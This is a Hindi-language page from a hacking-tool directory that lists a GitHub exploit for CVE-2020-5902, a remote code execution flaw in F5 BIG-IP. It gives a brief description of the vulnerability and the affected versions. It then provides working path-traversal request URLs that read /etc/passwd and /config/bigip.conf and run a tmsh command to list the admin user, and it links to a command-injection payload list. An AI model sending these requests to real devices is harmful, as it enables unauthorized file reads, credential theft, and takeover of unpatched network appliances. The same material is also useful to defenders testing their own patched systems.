Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
RCE-CVE-2020-5902 — BIG-IP F5 रिमोट कोड एक्ज़ीक्यूशन | Kitploit
उपकरण/GitHubGitHub/jsec1337/rce-cve-2020-5902
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubjsec1337/rce-cve-2020-5902

RCE-CVE-2020-5902

BIG-IP F5 रिमोट कोड एक्ज़ीक्यूशन

रिपॉजिटरी देखें
116 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

RCE-CVE-2020-5902

BIG-IP F5 रिमोट कोड एक्ज़िक्यूशन

विवरण

ये हमले F5 Networks द्वारा निर्मित एक बहुउद्देशीय नेटवर्किंग डिवाइस BIG-IP को लक्षित कर रहे हैं। BIG-IP डिवाइसों को ट्रैफ़िक शेपिंग सिस्टम, लोड बैलेंसर, फ़ायरवॉल, एक्सेस गेटवे, रेट लिमिटर, या SSL मिडलवेयर के रूप में कार्य करने के लिए कॉन्फ़िगर किया जा सकता है।

बुधवार को, F5 Networks ने पैच प्रकाशित किए और BIG-IP डिवाइसों में "रिमोट कोड एक्ज़िक्यूशन" भेद्यता के बारे में एक सुरक्षा सलाह जारी की।

F5 ने कहा कि CVE-2020-5902 के रूप में ट्रैक की जाने वाली यह भेद्यता हमलावरों को इंटरनेट पर सुलभ बिना पैच वाले सिस्टम पर पूर्ण नियंत्रण लेने की अनुमति दे सकती है।

root@kitploit:~
Version BIG-IP Vulnerable : 15.0.0-15.1.0.3, 14.*.*, 13.*.*, 12.*.*, 11.*.*
Vulnerability             : Remote Code Execution (RCE) 
Score CVE                 : 10/10

शोषण

root@kitploit:~
https://<BIG-IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
root@kitploit:~
https://BIG-IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
root@kitploit:~
https://<BIG-IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

NMAP जाँच

पेलोड RCE

https://github.com/payloadbox/command-injection-payload-list

संदर्भ

https://twitter.com/Nep_1337_1998/status/1279610946864820225

https://www.zdnet.com/article/hackers-are-trying-to-steal-admin-passwords-from-f5-big-ip-devices/

टूल डाउनलोड करें